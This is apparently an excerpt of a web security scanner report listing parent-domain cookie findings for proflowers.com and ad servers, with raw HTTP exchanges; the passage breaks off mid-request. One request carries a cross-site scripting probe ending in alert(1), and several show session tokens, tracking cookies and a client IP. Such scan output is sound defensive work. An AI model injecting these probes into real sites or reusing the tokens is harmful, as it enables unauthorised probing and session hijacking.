12.7. http://www.proflowers.com/mothers-day-flowers-MDF

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.proflowers.com
Path:   /mothers-day-flowers-MDF

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mothers-day-flowers-MDF?tile=hmpg_hero1&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fmothers-day-flowers-MDF%25253Ftile%25253Dhmpg_hero1%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:22 GMT
Content-Length: 238190


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...

12.8. http://www.proflowers.com/send-flowers-bsl

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.proflowers.com
Path:   /send-flowers-bsl

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /send-flowers-bsl?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM?0&5/9/2011 5:17:23 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:17:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:23 GMT
Content-Length: 251606


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...

12.9. https://accounts.proflowers.com/CustomerLogin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /CustomerLogin.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomerLogin.aspx?Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=tjb3lzavlroebrfrqg11rbq2; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:32 GMT
Content-Length: 60636

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...

12.10. https://accounts.proflowers.com/Default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /Default.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.aspx?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vkckynuy3ubxtgsnb1qqko4a; path=/; HttpOnly
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:13 GMT
Content-Length: 53696

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...

12.11. http://ad.trafficmp.com/a/bpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=1657&id=1&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; dly2=3-lkkjy3-P~hoc~0~1uo0~1-; dmg2=2-null7566%4050%4057+53%3A01%3A72%3ANZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lkkjy3-1~70y9vrnt7vq8~146z~2ihm~0-; pct=1-oevyvt~gn7ey36j-vOrunivbe~gn7ey36i-yhpvq~gn7ey36j-; T_de95=ahc%3Aljs1%3A1; rth=2-ljzkpb-ahc~ljs1~1~1-g9g~lg1x~1~1-g9c~ld22~1~1-gyx~kz8s~1~1-jxb~e876~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 09 May 2011 01:01:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1046365390/?label=JkM_CPa6iwIQzon58gM&amp;guid=ON&amp;script=0
Connection: close
Set-Cookie: T_de95=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_ck8y=gj9%3Ax0sd%3A1; Domain=trafficmp.com; Expires=Tue, 08-May-2012 01:01:00 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-gj9~x0sd~1~1-ahc~ljs1~1~1-g9g~lg1x~1~1-g9c~ld22~1~1-gyx~kz8s~1~1-jxb~e876~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 08-May-2012 01:01:00 GMT; Path=/
Content-Length: 0


12.12. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=4298BE5B089CBB1E55E7A69A4E062327&rsi_site=BCE6C348CDB3347A37A6E9503B9F4896&rsi_event=3E8A9FCC69C70348C54F8308F5EEBF2B HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&browse_products=91637&fb_key=undefined%20Fields%20of%20Europe%20for%20Spring
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=...[SNIP]...; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=...[SNIP]...; rtc_0s-X=MLvntzM1ZwprJ5GrFviWjmmgATvMNHGJjojTTrWSZIpIFNkgDw/K4gucx48Ansn8gFdhbSFjRTa6QTj/I+16qFvFR8txZ3XhW+h/MeB/oGJTuWd71KWU93xLd4iO2rbczqqb71ITWUbp6EX0wNdtopvMxVqaM1JqYfNKs97ZtBaRULM0PwDcs+nUakr6T4pQ6ZAhwqqC8M5QeQgL3Mwz/l/LO7TuRHS3DG/WEBaa4GMZypMTtieoEqNYKS5uaQdc9YsZ/I7stOdJLd7Hv2XYRUoNtaop227HsWyGbHxMn003mjucGc0mruqE+6DHP6brM6nM6x/tn7oZ2DjdBMJUOZiv9xqjlXnqcVjrB3kXcNTeDq09E5IMKoYrVJlZkK6uobYwka3tRmxkmifKh23k49KG9Bf6S2yRaNGnAYLK+zm7JATIxubd282sNX+n1154JTW43J8wLUy5/9w1/V1bn+LfnLjopCoy5O0KIgr5+yVcorYv+yTBZ8FhgCJA+Q8QvQjH/z6qkFkkgV2Pc0Qu8ePOuvk8qolmk5a5cRl/uMAl5d1L5fAWohFKLmeKHnIc1teXHxZ62z3xlAPoH3vSe3gvL1dmnj44UotfcgD9gjypLg/DU9uqsl/Rdd2M4KoI4aNAtW2PewAt7/uqPhIVZ2lA67g753Fs+YYdF+aGv8uJwGCyFeT/2FR7o49m55h8Gwxj243dmAFbzNMgnnyKGgxLPowo3XlGRBBhnfGcjmQaduyakw2Situk66TlalCm1TQvRzzJbNCx+dssYOfOQB0bbtJ2ntUVoY0/MWG+7X9mFMcU0K1YsXlTv3JLgSG9szKwKoXeXI5nGPmexJQamIZZRu75FQen7qI5XVSM/FyhyjLG6RJHjFKcgLVTWbop0qonwtOz+dRaa+XzimvUgmjE/LsOByg4WyNecM6WuqsLzQSwbwkJu6ayeu/z8NTC7c0uuc9GN4iMyZ0VRwyeREtwXmyzI9BFcLyZ3Rs4ivUj2RjCjvtSsNNRHe2053cF2Vi66vu8vK0TwhhQ+4nNefilYUbTA6wV1dbQtthV8yc5tkCS4xO8RM2JqwjJ+2RL0MnC0HJ4Sa9kFkqhq5GF29eaWIKbJnhrkHmZYVI20kuZatlwGXCzd05n7WE/cFig6PF+oHMyVEvg3H2Geqve6dtrbR5/nlqFYJUJmU1LO9t6E30Vexgt/OqPCKtq5Buy0heNFn43D/XEPUM075oPE41B7rGtcoZLDHSX5xusWqM7Xz3Yy0rj1w/OGBhEfzOXP0tA8vgBAjPNzEOqo9q4g3TV0zqIlK03g3UEsVsKd8lrYh6vves5TCqBe0HeDGyLF1ZryuAIiKWwjLAn92Tu49HaCCp5ZapUWKSIpxW6EBmQA4m6a+VSTrtsZqZKuqbIAMmb6Z5nlEJ0CvScdpzM8bELtNupCMCENC4+mcWsy8PXof63WNfpjPhyWcxL6XPwO+XIvL1yoRu187rFg4rnh0OUfdRdE7b+DsMlXGSWyiWEOb7KYoa7LZDfbPfYMXY=; rsiPus_8M_3="...[SNIP]..."; rsi_us_1000000="pUM9IzlDOAYc1U2ENgyhQng1Be7z7sLKw3jzv8rD7yutq5CDQ0Q8aZKAy3gHZduyW7zv43bzfN67P/5NzyurwWondhYeen7CWIWgxbqCdmY3a4wLoRcc/Reee8KNhj4BKp/euTN0DtKguTSkIDJ1vURStfWhCx5vdVhSw4H7sbZeLBt7cLZmC4R4RZG7fRG9H8EygB0KjrtgkS5/khqQTfWqMN+CQ7Re6dOsKbW6QCZw8Dy0JZ2jJgBRRN67npYQXY032n3+oCQ3q612E1CGsBQiuqZsfA5dZoy+uIW5D/D0r/XwM9wGw7l8HY0p4cwTPS7esM3w5lbCklgt/yNLi8Ih4fiXI7Kt2ZkX7dRZ8f8wICWkrpK2Tyqz9lk8gjR0ud3Njd4DLEQYQ52MTXD/E8REHhIOJSQiiGx50SD9yT9a5K72SQ9s6UpKFIYHCjsW0XJfDiR3UsJK+8WYg/VZOgiFw7QPdBC2+b/LiFDN627XlM3IUocsS1co3tAWOBD+rhB7D7TzR2PQGhc7PnHKe5+pg4ay4m/MuURvgG7SG6kmVhSHwZtzPCtXe9nVJwwwqzpGdKp/JcVvqe1cR+AO9nk+pZTXEGB2RR8cakFnhvB+5QR/xTMLSr1QnREn5KuWpPBdmk8ldJd6zXxtBO7Tkv97Z/BtuApaw7WZiT1IMop1RwvMrd+pw054zxi4C+4/HCdkcdis4luyl92Y1SpKqfV1PzoiVwa24vHOm917syTpes+2sYgv3uTbICeM9/Kj4fRDls47jiyDeFhZZBL5pnaLvuwzkq+KlywCU6mHoBjaCbAPlF65eyavgRSySOAWUWo/fQKkSGdsNC2QzBtlF0zyE6T2FrNMt16Pw9l+yFaLlbt0tXHwsqBkzuZWx3y0C3if2kww3wr+Z+JovuWA6Z8M1/r9DCXyrPTIVh9T9incB64/hgqfDK0QL013XAcR2XOJyAAA5vFdniF49hWrT8fR9uOV9c+kzEPBXwcXL0OMdVMUbcPkqnk+kVar3aG0PayeJwXSzuCI2pgzWkLtYs26LeQYLxmsjjHs7vcBGSpavo22HaEjA1ba4DaWCB+bFr3k7XVpbB5qwpNHRkCkZ77/UBJv01pt4XC4DAkfk3Ez7bHArrmb2X25X/l2iGpuYTDqCuAeR1whZ1F0erqLBzvaSriTPduUpkzo8ILLpKXx2R2HDOei+clQOMxb0cM3b4j2LoecLbdBeykr1KInZlRj+7F9LQMTvAHxlfg3BY6u/iHTp0QEKNmfkGRZdVhLGvY7Goafa2yt/lBjKcISAa/c80uQzhksgH6pF0cmHfqP2P02qSFNz6eMJ74hVELzN5l4DAgFOGEv7Yff4YzdAI7OC5bP5U6iQDkFclbNcZuLB/28xD4b5YEtGy2QydMcWl8nIT18I/9KHFpZKfmBXkImm6gFbB2MudKZEtB76izQuckAgZVlJ4V5t9qhXF62TO6EdyPnwlW0lCD85YsJI7JgNDWC95j/iAx5W/1ydJH20DePSoJcp093rdAxL/ln"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_T3XK="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=987677&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:09:50 GMT


12.13. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305609&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw
